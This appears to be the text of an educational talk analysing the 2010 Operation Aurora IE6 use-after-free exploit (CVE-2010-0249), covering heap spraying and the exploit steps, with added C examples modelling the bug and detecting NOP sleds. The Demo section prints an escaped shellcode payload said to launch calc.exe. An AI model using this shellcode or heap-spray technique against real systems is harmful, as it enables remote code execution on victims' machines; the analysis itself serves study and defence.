Exploit Analysis
Anatomy of the Talk
∙ Background
∙ “Operation Aurora”
∙ The Heap
∙ The Heap Spray
∙ The Vulnerability
∙ The Exploit
∙ The Code
∙ The Debugging
∙ The Demo
∙ The End
Background
December ’09: China hacks Google
∙ Adobe vulnerabilities suspected at first
∙ Later, IE6 was identified as the culprit
∙ Chinese hackers breached an internal auditing tool used by law enforcement agencies to monitor emails in order to spy on human rights activists and others
Jan ’10: Google attacks China
∙ Threatens to stop censoring search results
∙ Reveals they hacked China back: black hats ftw!
∙ The world goes ape-shit
Jan 14th: Exploit code released on the net
“Operation Aurora”
Sophisticated, multitier attack
1. Possible email forgery
2. 0-day IE6 exploit (CVE-2010-0249)*
3. Payload downloads and activates malware
4. Remote connection to attacker is established
5. ???
6. Profit
* 16% browser share
The Heap
First, a little about memory
∙ User applications store dynamic data in the heap
∙ In Windows, the heap extends until address 0x7fffffff
∙ As a program uses more memory, the useable heap grows
∙ The more the useable heap grows, the more space we have to play with…
How can we exploit this?
[Diagram: the heap, with the useable portion growing toward 0x7fffffff]
The Heap Spray
Heap spray! Fills the heap up with garbage data + shellcode (ie “sprays” data at the heap)
If we can get our program to call or jump somewhere in our injected heap, win!
[Diagram: the useable heap filled with INJECTED blocks, labelled “jmp here plz kthx”]
The Vulnerability
CVE-2010-0249 HTML Object Memory Corruption Vulnerability
∙ “Use after free”
∙ Remote code execution
∙ Load an object, delete it, inject your code, call the object
In pictures!
∙ Create an object (an OBJECT block appears in the useable heap)
∙ Delete object (the block is marked USEABLE SPACE again)
The memory shouldn’t be useable again without being reallocated… but it is!
The Exploit
5 Steps
1. Create space to overwrite our yet-to-be-created object with
2. Spray the heap with nops and our payload
3. Load and dereference an image as our object
4. Inject a pointer to our malicious code (step 2) inside the memory of our “image”
5. Call the “image” again
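The five steps above, and the create/delete/inject/call sequence from the Vulnerability section, modelled in C as an added example that is not code from the talk. The pool allocator, the image_t type, legit_handler and the 0x41 filler are all constructed here: vulnerable_flow keeps its reference to the deleted object so the same-size fill lands under it, hardened_flow clears the reference on delete so the call site has nothing stale to use.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#define CHUNK 32
#define NCHUNKS 8

/* Heap object with a function pointer, standing in for the vtable slot of the
   HTML object the exploit reuses (constructed for this example). */
typedef struct { void (*on_load)(void); char name[CHUNK - sizeof(void *)]; } image_t;

/* Toy pool allocator: the most recently freed chunk is handed out first, which
   is what lets a same-size allocation (the spray) land on a deleted object. */
static uint8_t pool[NCHUNKS][CHUNK];
static int free_stack[NCHUNKS], free_top, next_fresh;
static void pool_reset(void) { free_top = 0; next_fresh = 0; }
static void *pool_alloc(void) {
    if (free_top > 0) return pool[free_stack[--free_top]];
    return next_fresh < NCHUNKS ? (void *)pool[next_fresh++] : NULL;
}
static void pool_free(void *p) { free_stack[free_top++] = (int)(((uint8_t *)p - &pool[0][0]) / CHUNK); }

static void legit_handler(void) {}
static image_t *current;                 /* the program's reference to its object */
/* "Call the object": 1 if control would leave legit_handler, 0 if nothing runs. */
static int call_current(void) {
    return current != NULL && current->on_load != legit_handler;
}

/* Vulnerable: delete frees the chunk but `current` keeps pointing at it. */
int vulnerable_flow(void) {
    pool_reset();
    current = pool_alloc(); current->on_load = legit_handler;   /* create */
    pool_free(current);                        /* delete, reference kept */
    uint8_t *spray = pool_alloc();             /* same size: reuses the freed chunk */
    memset(spray, 0x41, CHUNK);                /* constructed filler under the stale object */
    return call_current();                     /* on_load now reads 0x4141...: returns 1 */
}

/* Hardened: the owner clears its reference when it deletes the object, so a
   later call finds nothing to dereference, whatever the heap now holds. */
int hardened_flow(void) {
    pool_reset();
    current = pool_alloc(); current->on_load = legit_handler;
    pool_free(current);
    current = NULL;                            /* no dangling reference survives delete */
    uint8_t *spray = pool_alloc();
    memset(spray, 0x41, CHUNK);
    return call_current();                     /* returns 0 */
}
```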
The Debugging
We’ll load up the exploit with our shell code:
payload = unescape("%uccccSHELLCODE SHELLCODE");
If it works, EIP (the address of the next instruction to be executed) should now point into “SHELLCODE SHELLCODE”
Note: %ucccc == int 3, the x86 software breakpoint, so the debugger stops right where the sprayed block is hit
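An added example, not code from the talk: a C decoder for the unescape()-style payload strings used here (each %uXXXX escape becomes the 16-bit unit XXXX stored little-endian, the byte layout a sprayed JavaScript string has in memory), with helpers that check for the 0xCC int 3 marker from the debugging step and measure the leading 0x90 NOP sled from the heap-spray slide. Function names and the 256-byte working buffer are constructed for this example; plain %XX escapes are not handled.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Decode an unescape()-style string into the bytes a JavaScript engine keeps
   for it (UTF-16, little-endian): %uXXXX becomes the unit XXXX, any other
   character becomes its code followed by a zero byte. Returns the byte count,
   or -1 on a bad escape or a full buffer. */
int decode_u_escapes(const char *s, uint8_t *out, size_t cap) {
    size_t n = 0;
    while (*s) {
        unsigned unit;
        if (s[0] == '%' && s[1] == 'u') {
            char hex[5] = {0};
            for (int i = 0; i < 4; i++) {
                if (!isxdigit((unsigned char)s[2 + i])) return -1;
                hex[i] = s[2 + i];
            }
            unit = (unsigned)strtoul(hex, NULL, 16);
            s += 6;
        } else {
            unit = (unsigned char)*s++;
        }
        if (n + 2 > cap) return -1;
        out[n++] = (uint8_t)(unit & 0xff);   /* low byte first: %ucccc -> cc cc, 'S' -> 53 00 */
        out[n++] = (uint8_t)(unit >> 8);
    }
    return (int)n;
}

/* Byte at offset i of the decoded payload, or -1 if malformed or out of range. */
int decoded_byte(const char *escaped, size_t i) {
    uint8_t buf[256];
    int n = decode_u_escapes(escaped, buf, sizeof buf);
    return (n < 0 || i >= (size_t)n) ? -1 : buf[i];
}

/* Length of the leading run of 0x90 (x86 NOP) bytes: a long run at the front
   of sprayed data is the classic sled signature. -1 if the string is malformed. */
int nop_sled_length(const char *escaped) {
    uint8_t buf[256];
    int n = decode_u_escapes(escaped, buf, sizeof buf), len = 0;
    while (len < n && buf[len] == 0x90) len++;
    return n < 0 ? -1 : len;
}

/* 1 if the payload opens with the 0xCC int 3 marker (%ucccc) used in the
   debugging step to prove that EIP really landed in the sprayed block. */
int starts_with_int3(const char *escaped) {
    return decoded_byte(escaped, 0) == 0xcc && decoded_byte(escaped, 1) == 0xcc;
}
```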
The Demo
Inject shellcode to run calc.exe
payload_calc = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");
Looks fancy, huh?
References
General
∙ http://arstechnica.com/tech-policy/news/2010/01/google-and-china-the-attacks-and-their-aftermath.ars
∙ http://www.mcafee.com/us/threat_center/operation_aurora.html
∙ http://www.geoffchappell.com/notes/security/aurora/index.htm
In depth
∙ http://www.symantec.com/connect/blogs/trojanhydraq-incident-analysis-aurora-0-day-exploit
∙ http://www.sophos.com/blogs/duck/g/2010/01/20/aurora-exploit-live/
Code
∙ http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0249
∙ http://www.exploit-db.com/exploits/11167
∙ http://blog.metasploit.com/2010/01/reproducing-aurora-ie-exploit.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+metasploit%2Fblog+%28Metasploit+Blog%29
∙ http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js
Presentation
∙ http://www.calpolyswift.org/ (under “Presentations”)